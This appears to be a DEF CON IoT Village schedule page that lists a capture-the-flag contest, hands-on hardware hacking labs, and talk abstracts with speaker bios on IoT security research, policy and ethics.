|Capture the Flag
Capture the Flag
In this 3-time DEF CON Black Badge CTF, teams compete against one another by exploiting a network of off-the-shelf IoT devices. These 40+ devices all have known vulnerabilities, but to successfully exploit these devices requires lateral thinking, knowledge of networking, and competency in exploit development. CTFs are a great experience to learn more about security and test your skills, so participants can join up in a team (or go alone) and compete for fun and prizes! Exploit as many devices as possible during the event and the top three teams will be rewarded.
The CTF is accessible to both virtual and on site attendees.
Prizes generously provided by INE and Hardwear.io
1st place: 1 year premium subscription to the INE platform and 1 EXPLIoT Kit provided by Hardwear.io
2nd place: $400 eLearnSecurity voucher
3rd place: $200 eLearn Security voucher
|IoT Village labs
IoT Village labs
IoT Hacking 101 is a set of quick, hands-on labs developed to teach the tools and techniques for discovering and exploiting some of the common weaknesses found in IoT devices today. Whether you're a penetration tester that has never hacked IoT devices or even someone that has never hacked anything(!), these self-guided labs will walk you through all the steps from analyzing router firmware, finding hidden backdoors, enumerating devices and performing remote exploits. Students work at their own pace following our IoT Hacking 101 guides, and instructors are on hand to provide assistance as needed and answer any questions. IoT Village currently offers 3 labs and is adding new labs in 2021 to expand our content even further.
|UART TO UBOOT TO ROOT
UART TO UBOOT TO ROOT
Rapid7 will be returning to the IoT Village this year with more hands-on hardware hacking exercises. In this year's exercises, we will be guiding the attendees through a multistep process to gain physical full root access to a targeted IoT device. This series of exercises will cover multiple steps including UART access, U-boot console access, working with U-Boot environment variables, single user mode access, identifying and mounting of writable flash chip partitions, and account creation process.
This activity will be available August 6-7 on site
Speakers: Deral Heiland, Morgan Holkesvik, James King, Erick Galinkin, Tod Beardsley
Are your finding IoT Hacking exciting but a little over your head? INE presents a gentle introduction with live, hands-on labs directly from our venerable Penetration Tester Student (PTS) Learning Path. To play on your own, PTS is 100% free as part of the INE Starter Pass and comes with slides, videos, and unlimited time in our virtual labs to prepare you for eLearnSecurity’s Junior Penetration Tester (eJPT) certification exam (not included). You’ve got nothing to lose and a life-changing career move to gain! Scan the QR code to signup today.
This activity will be available August 6-7 on site
Speakers : Don Donzal, Lily Clark
|Black Box Challenges
Black Box Challenges
Think you’ve got what it takes to hack devices you can’t see? Are you able to figure out and map the network/ecosystem? Is your google-fu game strong? Push yourself to the limit in a real-world simulated CTF challenge where the only thing we give you...is a single IP…the rest is up to you.
This content is exclusively onsite in Las Vegas, Nevada.
|10:00AM - 10:30AM
|When Penetration Testing Isn’t Penetration Testing At All
When Penetration Testing Isn’t Penetration Testing At AllAbstract
When companies want to build secure IoT systems, they know they need to test their system for security flaws, which typically leads them to seek out “penetration testing.” However, this term has become so misused across the security community that it’s hard to decipher what is really happening.
Ted Harrington is the #1 best selling author of HACKABLE: How to Do Application Security Right, and the Executive Partner at Independent Security Evaluators (ISE), the company of ethical hackers famous for hacking cars, medical devices, web applications, and password managers. He’s helped hundreds of companies fix tens of thousands of security vulnerabilities, including Google, Amazon, and Netflix. Ted has been featured in more than 100 media outlets, including The Wall Street Journal, Financial Times, and Forbes. His team founded and organizes IoT Village, an event whose hacking contest is a three-time DEF CON Black Badge winner. He hosts the Tech Done Different podcast.
|10:45AM - 11:30AM
|Chloe Messdaghi and Camille Eddy
We often hear about the importance of Diversity, Equity, and Inclusion (DEI) and how companies are striving to do better. However, there are plenty of examples where DEI that is being promoted is not actually happening behind scenes. Stories of those who are marginalized in tech showcasing we still have a large problem with companies practicing lip service and no actual actions to show for it. One way to see if a company is trying to be better on DEI is reflected on the board and C-suite. Yet, still to this day less than 20% of company boards represent marginalized identities.
Chloé Messdaghi is a tech changemaker who is innovating tech and information security sectors to meet today’s and future’s demands by accelerating startups and providing solutions that empower. She is an international keynote speaker at major information security and tech conferences and events, and serves as a trusted source to reporters and editors, such as Forbes and Business Insider. Additionally, she is one of the Business Insider’s 50 Power Players. Camille Eddy is a Product Engineer and International Public Speaker. She earned her Bachelor of Science degree in Mechanical Engineering from the University of Idaho. Camille has given her talk “Recognizing Cultural Bias in AI” across the world, including San Francisco, Washington DC and Budapest; Helping Technical and Non-Technical Project Managers, Founders and Engineering Leads build better products. Finally, she coaches women building online platforms, helping them make a profitable business working on their passion.
|11:45AM - 12:30PM
|1.21 Gigawatts! Vulnerabilities in Solar Panel Controllers
1.21 Gigawatts! Vulnerabilities in Solar Panel ControllersAbstract
Embedded device security has come a long way since the days of telnet and default passwords. Product vendors are now doing more to secure their devices but how effective are they? This presentation will outline many of the software and hardware-based attacks used to compromise embedded systems. It also discusses some of the mitigations used to prevent these attacks. Many previous IoT talks show the simplicity of hacking devices that have weak security or no hardening. In contrast, this presentation shows how even secured devices have attack surfaces that still need to be addressed. It demonstrates the need for embedded devices to incorporate a security lifecycle plan and hardware designs must be audited for security weakness before production. Topics to be covered include firmware image encryption, disabling UART console access, hardening JTAG development access, securing e.MMC storage, NOR Flash protection, processor glitching, update lifecycle attacks, avoiding custom crypto, dealing with reverse engineers, and initial device setup vs authentication. None of these topics will be a deep dive. The intent is to show how they are attacked or utilized to mitigate specific attacks. To illustrate these topics the presentation will use a recent security audit of a US solar equipment manufacturer as a case study. The vendor incorporated many best practices for securing embedded devices but made some architecture decisions in the guise of security that ended up weakening their security posture rather than helping it. Finally, we'll show the ramifications of an attack against solar systems and how it could be used for racketeering. Attacks in this talk are beneficial to system designers, hobbyists, and researchers.Bio
Waylon Grange is an experienced vulnerability researcher, reverse engineer, and developer. Prior to Stage 2, he worked for Symantec and the NSA. Waylon has been a speaker at Black Hat, DefCon, RSA, CanSecWest, and DerbyCon and is credited with a US patient, multiple CVEs, and exposing APT groups. His in-depth knowledge of embedded systems is utilized to evaluate the security of IoT systems and develop electronic badges for conferences.
|12:45PM - 1:15PM
|LED Light Lunacy!
LED Light Lunacy!Abstract
All your LEDs are mine ... How a case of lockdown boredom turned into led lights for everyone !Bio
Security Researcher at SpiderLabs
|1:30PM - 2:15PM
|5 years of IoT vulnerability research and countless 0days - A retrospective
|Alex "Jay" Balan
5 years of IoT vulnerability research and countless 0days - A retrospectiveAbstract
How many 0days can a research team discover in 4 years of vulnerability research in IoT? How many of them are relevant and can be used even today? How to get started (or advance further) with IoT vulnerability research? This talk will answer all these questions and show you some hands-on shell-popping and authentication bypasses as well as some new 0days published this yearBio
Alex "Jay" Balan is the Security Research Director and Spokesperson for Bitdefender. His career is focused on Information Security and Innovation, fields in which he has so far accumulated over 20 years of experience. He is now furthering security and privacy research and has been actively involved in creating awareness by speaking at a number of conferences including DEFCON , Derbycon, RSA, BSides, ISC China, and many others
|2:30PM - 3:15PM
|BLUEMONDAY Series – Exploitation & Mapping of vulnerable devices at scale through self-registration services (DATTO/EGNYTE/SYNOLOGY/MERAKI/GEOVISION)
BLUEMONDAY Series – Exploitation & Mapping of vulnerable devices at scale through self-registration services (DATTO/EGNYTE/SYNOLOGY/MERAKI/GEOVISION)Abstract
Vendors like DATTO, MERAKI, GEOVISION, SYNOLOGY, EGNYTE and others are which leverage or depend on these services are imperiling data, networks, and businesses through insecure design, intentional design decisions, and web application flaws.
Ken Pyle is a partner of CYBIR, specializing in Information Security, exploit development, penetration testing and enterprise risk management. Ken is a graduate professor of CyberSecurity at Chestnut Hill College. He has published academic works on a wide range of topics and has presented at industry events such as ShmooCon, Secureworld, HTCIA International.
|3:30PM - 4:15PM
|“Alexa, have you been compromised?” — Exploitation of Voice Assistants in Healthcare (and other business contexts)
|Hutch (Justin Hutchens)
“Alexa, have you been compromised?” — Exploitation of Voice Assistants in Healthcare (and other business contexts)Abstract
As voice assistant technologies (such as Amazon Alexa and Google Assistant) become increasingly sophisticated, we are beginning to see adoption of these technologies in the workplace. Whether supporting conference room communications, or even supporting interactions between an organization and its customers — these technologies are becoming increasingly integrated into the ways that we do business. While implementations of these solutions can streamline operations, they are not always without risk. During this talk, the speaker will discuss lessons learned during a recent penetration test of a large-scale “Alexa for Business” implementation in a hospital environment where voice assistants were implemented to assist with patient interactions during the peak of the COVID-19 pandemic. The speaker will provide a live demonstration of how a cyber-criminal could potentially use pre-staged AWS Lambda functions to compromise an “Alexa for Business” device with less than one-minute of physical access. Multiple attack scenarios will be discussed to include making Alexa verbally abuse her users (resulting in possible reputation damage), remote eavesdropping on user interactions, and even active “vishing” (voice phishing) attacks to obtain sensitive information. Finally, the talk will conclude with a discussion of best-practice hardening measures that can be taken to prevent your “Alexa for Business” devices from being transformed into foul-mouthed miscreants with malicious intent.Bio
Justin Hutchens (“Hutch”) is the Assessments Services Practice Lead at Set Solutions and manages TVM, IR, and GRC services. He is the co-host of the "Ready, Set, Secure" InfoSec podcast. He is also the creator of Sociosploit, a research blog which examines exploitation opportunities on the social web – a confluence of his interests in both hacking and social psychology. Hutch has spoken at multiple conferences to include HouSecCon, ToorCon, and DEF CON.
|4:30PM - 5:15PM
|IoT Testing Crash Course
|Tim Jensen (EapolSniper)
IoT Testing Crash CourseAbstract
In this IoT 101 level talk I provide practical instruction to security focused individuals who want to test IoT devices for critical vulnerabilities. Included will be basic network pentesting of the device, web app or other UI testing, extracting/downloading firmware, and using binwalk. This will also include reviewing binaries for potential backdoors, looking for hardcoded credentials, and whitebox code review of the UI interface to look for backdoors or other vulnerabilities. All testing will be done against publicly downloadable binaries.Bio
Tim has 9 years of professional security experience, largely in network, IoT, and web application penetration testing. He ran a hack lab in Fargo, ND for 4 years where he taught hardware hacking and penetration testing on evenings and weekends. When not hacking, Tim enjoys cycling, walking, and live music.
|5:30PM - 6:15PM
|Defending IoT in the Future of High-Tech Warfare
Defending IoT in the Future of High-Tech WarfareAbstract
The increase of cyberattacks using IoT devices has exposed the vulnerabilities in the infrastructures that make up the IoT and have shown how small devices can affect networks and services functioning. This talk presents a review of the vulnerabilities that bear the IoT and assessing the experiences in implementing RF attacks targeting the Internet of Things and analyses various facets of the IoT centricity of future military operations based on the IoT concept, IoT-led future shaping of the things, challenges, and developmental trajectories of major powers.Bio
Harshit Agrawal is currently working as a Radio Security Researcher. He is enthusiastic about Sigint, Drone Pentesting, and IoT Security. He presented his research at Security conferences like RSAC USA, HITB Cyberweek, HITB Amsterdam, etc. Previously, he was President at CSI Chapter and Vice President for Entrepreneurship cell at MIT, where he also headed the team of security enthusiasts, giving him a good insight into cybersecurity and increased his thirst to explore more in this field.
|10:00AM - 10:45AM
|I used AppSec skills to hack IoT, and so can you
I used AppSec skills to hack IoT, and so can youAbstract
We tend to think of AppSec and IoT as two separate infosec disciplines. Sure, the domain knowledge, attack vectors, and threat mitigation are not exactly the same in those two worlds. At the same time, as the hardware continues to evolve, we see more and more tiny general purpose computers around us. Many of these tiny computers nowadays run software that is written in a conventional programming language, listen on network ports, process data inputs, and communicate with the outside world. These devices can be attacked just like any other application running on a desktop, on a server, or in the cloud.
Alexei began his career as a software developer. A decade later, he realized that breaking code was way more fun than writing code, and decided to switch direction. He is now a full-time application security professional, with several years of assisting various development teams in delivering secure code, as well as security consulting. Outside of his day job, Alexei enjoys doing security research and learning new hacking techniques.
|11:00AM - 11:45AM
|You're Doing IoT RNG
|Dan "AltF4" Petro and Allan Cecil
You're Doing IoT RNGAbstract
Think of a random number between '0' and infinity. Was your number '0'? Seriously? Crap. Well unfortunately, the hardware random number generators (RNG) used by your favorite IoT devices to create encryption keys may not work much better than you when it comes to randomness.
Dan "AltF4" Petro is Lead Researcher at Bishop Fox. Dan is widely known for the tools he creates: Eyeballer (a convolutional neural network pentest tool), the Rickmote Controller (a Chromecast-hacking device), Untwister (pseudorandom number generator cracker), and SmashBot (a merciless Smash Bros noob-pwning machine). Allan Cecil (dwangoAC) is a Security Consultant with Bishop Fox and the President of the North Bay Linux User’s Group. He acts as an ambassador for Tasvideos.org, a website devoted to using emulators to complete video games as quickly as the hardware allows. He participates in Games Done Quick charity speed running marathons using TASBot to entertain viewers with never-before-seen glitches in games.
|12:00PM - 12:30PM
|Strategic Trust and Deception in the Internet of Things
Strategic Trust and Deception in the Internet of ThingsAbstract
"Game Theory is the study of choices and strategies made by rational actors, called ""players,"" during times of conflict or competition. It has been used throughout history to map human conflict. Statisticians use game theory to model war, biology, and even football. In this talk, we will model interactions between IoT devices based on strategic trust; how agents decide to trust each other.
Raised in the woods of Alaska, Juneau attributes her love of hacking to a childhood spent building and breaking things. After studying computer science and economics, she moved to Dallas, Texas, where she found a home in the local community and started speaking at cons. Now Juneau works as a red teamer and continues her research in grad school. When she isn't programming or asking strangers about the prisoner's dilemma, Juneau breathes fire and runs DC214; Dallas's DefCon group.
|12:45PM - 1:30PM
|MIPS-X - The next IoT Frontier
|Patrick Ross, Zoltán Balázs
MIPS-X - The next IoT FrontierAbstract
IoT vulnerability research usually involves both static and dynamic analysis of the target device. To aid in this task, researchers typically perform some sort of emulation to enumerate the filesystem as well as run the respective binaries. Luckily, there are tools like QEMU and/or Buildroot to guide our path on the way, but this does not mean the way is smooth.
Patrick (0xn00b), a DEF CON 26 Black Badge holder, is the co-founder of Village Idiot Labs which helps run IoT Village across the globe. Patrick has created a fully immersible/virtual web-based lab environment that people can learn how to hack IoT without the need for their own tools, equipment or even prior knowledge. Zoltan (@zh4ck) is the Head of Vulnerability Research Lab at CUJO AI, a company focusing on smart home security. Before joining CUJO AI he worked as a CTO for an AV Tester company, as an IT Security expert in the financial industry, and as a senior IT security consultant. He is also the developer of the Hardware Firewall Bypass Kernel Driver (HWFWBypass), the Encrypted Browser Exploit Delivery tool (#IRONSQUIRREL) and the Sandbox tester tool to test Malware Analysis Sandboxes.
|1:45PM - 2:30PM
|Mind the Gap - Managing Insecurity in Enterprise IoT
Mind the Gap - Managing Insecurity in Enterprise IoTAbstract
"IoT is an ever-expanding attack surface about which we have many misconceptions and assumptions but for which we have very few policies, regulations or security. These are devices built for one purpose, not meant to be upgraded and rarely if ever patched. As more devices are enabled to connect and communicate online, in the relentless pursuit of innovation, we’ve put the cart before the horse and failed to construct a framework to effectively control and secure the capability created.
Cheryl Biswas is a Strategic Threat Intelligence Specialist with TD Bank in Toronto, Canada, experienced in security audits and assessments, privacy, disaster recovery and change management. She has an ITIL certification and a specialized honors degree in Political Science. She is actively engaged in the security community as a conference speaker and volunteer, mentors those entering the field, and champions women and diversity in cyber security as a founding member of “The Diana Initiative”.
|2:45PM - 3:30PM
|Reverse Supply Chain Attack - A Dangerous Pathway To Medical Facilities’ Networks
|Barak Hadad and Gal Kaufman
Reverse Supply Chain Attack - A Dangerous Pathway To Medical Facilities’ NetworksAbstract
The supply-chain attack vector has gained a lot of attention in the passing year. Our talk, however, will present a different type of a supply-chain attack vector -- the reverse supply-chain attack.
Barak Hadad is a security researcher at Armis, responsible for hunting zero days and reverse engineering. Formerly an R&D team lead in the Israeli Defense Forces Intelligence, his current focus is unraveling the mysteries of various embedded devices, found in hospitals, factories and anything in-between.
|3:45PM - 4:15PM
|Ethics at the Edge: IoT as the Embodiment of AI for Rampant Intelligence Actuation
Ethics at the Edge: IoT as the Embodiment of AI for Rampant Intelligence ActuationAbstract
"In the eyes of a smart device and their human controllers, the world is an immense source of data and power. The expanding Internet of Things ecosystem only adds fuel to this, empowering real-time automatic sensing + actuation posing regulatory dilemmas, easily exploitable definitions of trusted entities (e.g., see the 2021 Verkada hack), and measurements of security, robustness, and ethics that change apropos data in the blink of an eye.
Ria Cheruvu is an AI Ethics Lead Architect at the Intel Network and Edge engineering group, developing trustworthy AI products. She is 17 years old and graduated with her master’s degree in data science from Harvard University at 16. Her pathfinding domains include solutions for security and privacy for machine learning, fairness, explainable and responsible AI systems, uncertain AI, reinforcement learning, and computational models of intelligence.
|4:30PM - 5:00PM
|IoT devices as government witnesses: Can IoT devices ever be secure if law enforcement has unlimited access to their data?
|Jordan Sessler and Anthony Hendricks
IoT devices as government witnesses: Can IoT devices ever be secure if law enforcement has unlimited access to their data?Abstract
"A man in Connecticut was arrested after his wife’s Fitbit implicated him in her murder. Prosecutors in Arkansas sought to use data from an Amazon Echo as evidence against a murder suspect. Local police sought access to car, TV, and even refrigerator data to monitor Black Lives Matter protestors—and the FBI did the same thing to help track down suspects in the aftermath of the January 6th, 2021 riot at the U.S. Capitol.
Jordan Sessler is an attorney who advises clients on data security as a member of Crowe & Dunlevy’s Cybersecurity & Data Privacy Practice Group. In that role, he regularly engages with legal issues related to IoT devices and has represented companies in disputes with law enforcement regarding the discoverability of user- and device-generated data. Prior to beginning his practice, he graduated from Harvard Law School and clerked for U.S. District Court Judge D.P. Marshall Jr. Anthony Hendricks. Anthony Hendricks is an attorney who advises clients as the chair of Crowe & Dunlevy’s Cybersecurity & Data Privacy Practice Group. In that role, he frequently analyzes and litigates legal issues related to IoT devices. Prior to beginning his practice, he studied as Howard University's first Marshall Scholar and later graduated from Harvard Law School. He now teaches cybersecurity law as an adjunct professor at Oklahoma City University School of Law.
|5:15PM - 6:00PM
|The Journey of Establishing IoT Trustworthiness and IoT Security Foundation
|Anahit Tarkhanyan, Dr. Dr. Amit Elazari and Ria Cheruvu
The Journey of Establishing IoT Trustworthiness and IoT Security FoundationAbstract
The Internet of Things (IoT) ecosystem holds tremendous promise to promote innovation and productivity, and societal benefits. Yet, with increased connectivity, concerns remain with the growing attack surface. While the DFECON community often focuses on the security aspects of these issues, the multidimensional nature of IoT devices and the combination of AI/ML solutions, sparked standardization activities focusing more generally on the concept of “IoT trustworthiness”. This talk will introduce the audience to the latest developments in the IoT Security Policy landscape, proposals for confidence/certifications mechanisms emerging globally, and key IoT Security baseline standards developments, while exploring the connection to the IoT trustworthiness concept across the IoT Supply Chain. We will describe a case study of IoT robustness and trustworthiness applied in context of AI and smart analytics, including the importance of characterizing the behavior of data.Bio
Dr. Anahit Tarkhanyan - Principal Engineer, Intel Corp., Network and Edge Group, IoT CTO Office